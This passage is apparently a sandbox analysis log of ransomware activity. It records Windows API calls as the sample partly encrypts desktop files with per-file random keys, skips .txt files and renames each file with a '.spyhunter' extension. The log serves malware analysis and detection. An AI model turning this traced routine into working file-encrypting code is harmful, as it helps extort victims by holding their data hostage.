hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed94, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed94*=0x30, lpOverlapped=0x0) returned 1 [0149.209] CloseHandle (hObject=0x178) returned 1 [0149.245] GetProcessHeap () returned 0x2c0000 [0149.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.245] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qiuNJyqAqKnq_qT_VkiU.swf.spyhunter") returned 76 [0149.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qiuNJyqAqKnq_qT_VkiU.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qiunjyqaqknq_qt_vkiu.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qiuNJyqAqKnq_qT_VkiU.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qiunjyqaqknq_qt_vkiu.swf.spyhunter")) returned 1 [0149.246] GetProcessHeap () returned 0x2c0000 [0149.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.246] GetProcessHeap () returned 0x2c0000 [0149.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.246] GetProcessHeap () returned 0x2c0000 [0149.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e09178 | out: hHeap=0x2c0000) returned 1 [0149.246] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edd0 | out: pbBuffer=0x57edd0) returned 1 [0149.246] GetProcessHeap () returned 0x2c0000 [0149.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.247] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edc8*=0x30) returned 1 [0149.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\xF3isyhWbYWLIIlH.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\rngdt\\xf3isyhwbywliilh.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.247] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\xF3isyhWbYWLIIlH.mp4") returned 87 [0149.247] StrStrW (lpFirst="xF3isyhWbYWLIIlH.mp4", lpSrch=".txt") returned 0x0 [0149.247] GetProcessHeap () returned 0x2c0000 [0149.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.247] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed8c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed8c*=0x2800, lpOverlapped=0x0) returned 1 [0149.248] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.248] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed8c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed8c*=0x2800, lpOverlapped=0x0) returned 1 [0149.248] GetProcessHeap () returned 0x2c0000 [0149.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.249] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.249] WriteFile (in: hFile=0x178, lpBuffer=0x57edcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed8c, lpOverlapped=0x0 | out: lpBuffer=0x57edcc*, lpNumberOfBytesWritten=0x57ed8c*=0x4, lpOverlapped=0x0) returned 1 [0149.249] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed8c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed8c*=0x30, lpOverlapped=0x0) returned 1 [0149.249] CloseHandle (hObject=0x178) returned 1 [0149.789] GetProcessHeap () returned 0x2c0000 [0149.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.789] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\xF3isyhWbYWLIIlH.mp4.spyhunter") returned 97 [0149.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\xF3isyhWbYWLIIlH.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\rngdt\\xf3isyhwbywliilh.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\xF3isyhWbYWLIIlH.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\rngdt\\xf3isyhwbywliilh.mp4.spyhunter")) returned 1 [0149.789] GetProcessHeap () returned 0x2c0000 [0149.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.790] GetProcessHeap () returned 0x2c0000 [0149.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.790] GetProcessHeap () returned 0x2c0000 [0149.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39dc8 | out: hHeap=0x2c0000) returned 1 [0149.790] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edd0 | out: pbBuffer=0x57edd0) returned 1 [0149.790] GetProcessHeap () returned 0x2c0000 [0149.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.790] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edc8*=0x30) returned 1 [0149.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.790] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0149.790] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0149.790] GetProcessHeap () returned 0x2c0000 [0149.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.790] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed8c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed8c*=0x11a, lpOverlapped=0x0) returned 1 [0149.791] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.791] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x57ed8c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed8c*=0x11a, lpOverlapped=0x0) returned 1 [0149.791] GetProcessHeap () returned 0x2c0000 [0149.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.791] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.791] WriteFile (in: hFile=0x178, lpBuffer=0x57edcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed8c, lpOverlapped=0x0 | out: lpBuffer=0x57edcc*, lpNumberOfBytesWritten=0x57ed8c*=0x4, lpOverlapped=0x0) returned 1 [0149.791] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed8c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed8c*=0x30, lpOverlapped=0x0) returned 1 [0149.791] CloseHandle (hObject=0x178) returned 1 [0149.792] GetProcessHeap () returned 0x2c0000 [0149.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.792] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.spyhunter") returned 63 [0149.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.spyhunter")) returned 1 [0149.793] GetProcessHeap () returned 0x2c0000 [0149.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.793] GetProcessHeap () returned 0x2c0000 [0149.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.793] GetProcessHeap () returned 0x2c0000 [0149.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec23f0 | out: hHeap=0x2c0000) returned 1 [0149.793] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edc8 | out: pbBuffer=0x57edc8) returned 1 [0149.793] GetProcessHeap () returned 0x2c0000 [0149.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.793] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edc0*=0x30) returned 1 [0149.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D2Dzv.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d2dzv.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.794] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D2Dzv.rtf") returned 51 [0149.794] StrStrW (lpFirst="D2Dzv.rtf", lpSrch=".txt") returned 0x0 [0149.794] GetProcessHeap () returned 0x2c0000 [0149.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.794] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed84*=0x2800, lpOverlapped=0x0) returned 1 [0149.794] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.794] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed84*=0x2800, lpOverlapped=0x0) returned 1 [0149.795] GetProcessHeap () returned 0x2c0000 [0149.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.795] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.795] WriteFile (in: hFile=0x178, lpBuffer=0x57edc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed84, lpOverlapped=0x0 | out: lpBuffer=0x57edc4*, lpNumberOfBytesWritten=0x57ed84*=0x4, lpOverlapped=0x0) returned 1 [0149.795] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed84, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed84*=0x30, lpOverlapped=0x0) returned 1 [0149.795] CloseHandle (hObject=0x178) returned 1 [0149.795] GetProcessHeap () returned 0x2c0000 [0149.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.795] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D2Dzv.rtf.spyhunter") returned 61 [0149.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D2Dzv.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d2dzv.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D2Dzv.rtf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d2dzv.rtf.spyhunter")) returned 1 [0149.796] GetProcessHeap () returned 0x2c0000 [0149.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.796] GetProcessHeap () returned 0x2c0000 [0149.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.796] GetProcessHeap () returned 0x2c0000 [0149.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf430 | out: hHeap=0x2c0000) returned 1 [0149.797] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edc8 | out: pbBuffer=0x57edc8) returned 1 [0149.797] GetProcessHeap () returned 0x2c0000 [0149.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.797] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edc0*=0x30) returned 1 [0149.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BvDuCaAf.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bvducaaf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.797] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BvDuCaAf.gif") returned 54 [0149.797] StrStrW (lpFirst="BvDuCaAf.gif", lpSrch=".txt") returned 0x0 [0149.797] GetProcessHeap () returned 0x2c0000 [0149.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.797] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed84*=0x2800, lpOverlapped=0x0) returned 1 [0149.798] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.798] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed84*=0x2800, lpOverlapped=0x0) returned 1 [0149.798] GetProcessHeap () returned 0x2c0000 [0149.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.798] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.798] WriteFile (in: hFile=0x178, lpBuffer=0x57edc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed84, lpOverlapped=0x0 | out: lpBuffer=0x57edc4*, lpNumberOfBytesWritten=0x57ed84*=0x4, lpOverlapped=0x0) returned 1 [0149.798] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed84, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed84*=0x30, lpOverlapped=0x0) returned 1 [0149.798] CloseHandle (hObject=0x178) returned 1 [0149.799] GetProcessHeap () returned 0x2c0000 [0149.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.799] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BvDuCaAf.gif.spyhunter") returned 64 [0149.799] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BvDuCaAf.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bvducaaf.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BvDuCaAf.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bvducaaf.gif.spyhunter")) returned 1 [0149.800] GetProcessHeap () returned 0x2c0000 [0149.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.800] GetProcessHeap () returned 0x2c0000 [0149.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.800] GetProcessHeap () returned 0x2c0000 [0149.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2280 | out: hHeap=0x2c0000) returned 1 [0149.800] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edc0 | out: pbBuffer=0x57edc0) returned 1 [0149.800] GetProcessHeap () returned 0x2c0000 [0149.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.800] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edb8*=0x30) returned 1 [0149.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BphDidYJ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bphdidyj.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BphDidYJ.mp4") returned 54 [0149.800] StrStrW (lpFirst="BphDidYJ.mp4", lpSrch=".txt") returned 0x0 [0149.801] GetProcessHeap () returned 0x2c0000 [0149.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.801] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed7c*=0x2800, lpOverlapped=0x0) returned 1 [0149.801] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.801] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed7c*=0x2800, lpOverlapped=0x0) returned 1 [0149.802] GetProcessHeap () returned 0x2c0000 [0149.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.802] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.802] WriteFile (in: hFile=0x178, lpBuffer=0x57edbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed7c, lpOverlapped=0x0 | out: lpBuffer=0x57edbc*, lpNumberOfBytesWritten=0x57ed7c*=0x4, lpOverlapped=0x0) returned 1 [0149.802] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed7c*=0x30, lpOverlapped=0x0) returned 1 [0149.802] CloseHandle (hObject=0x178) returned 1 [0149.802] GetProcessHeap () returned 0x2c0000 [0149.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.802] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BphDidYJ.mp4.spyhunter") returned 64 [0149.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BphDidYJ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bphdidyj.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BphDidYJ.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bphdidyj.mp4.spyhunter")) returned 1 [0149.803] GetProcessHeap () returned 0x2c0000 [0149.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.803] GetProcessHeap () returned 0x2c0000 [0149.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.804] GetProcessHeap () returned 0x2c0000 [0149.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2338 | out: hHeap=0x2c0000) returned 1 [0149.804] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edc0 | out: pbBuffer=0x57edc0) returned 1 [0149.804] GetProcessHeap () returned 0x2c0000 [0149.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.804] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edb8*=0x30) returned 1 [0149.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9xY K6IMBhDZVM-bN1n.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9xy k6imbhdzvm-bn1n.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.804] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9xY K6IMBhDZVM-bN1n.png") returned 65 [0149.804] StrStrW (lpFirst="9xY K6IMBhDZVM-bN1n.png", lpSrch=".txt") returned 0x0 [0149.804] GetProcessHeap () returned 0x2c0000 [0149.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.804] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed7c*=0x2800, lpOverlapped=0x0) returned 1 [0149.805] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.805] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed7c*=0x2800, lpOverlapped=0x0) returned 1 [0149.805] GetProcessHeap () returned 0x2c0000 [0149.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.805] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.806] WriteFile (in: hFile=0x178, lpBuffer=0x57edbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed7c, lpOverlapped=0x0 | out: lpBuffer=0x57edbc*, lpNumberOfBytesWritten=0x57ed7c*=0x4, lpOverlapped=0x0) returned 1 [0149.806] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed7c*=0x30, lpOverlapped=0x0) returned 1 [0149.806] CloseHandle (hObject=0x178) returned 1 [0149.806] GetProcessHeap () returned 0x2c0000 [0149.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.806] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9xY K6IMBhDZVM-bN1n.png.spyhunter") returned 75 [0149.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9xY K6IMBhDZVM-bN1n.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9xy k6imbhdzvm-bn1n.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9xY 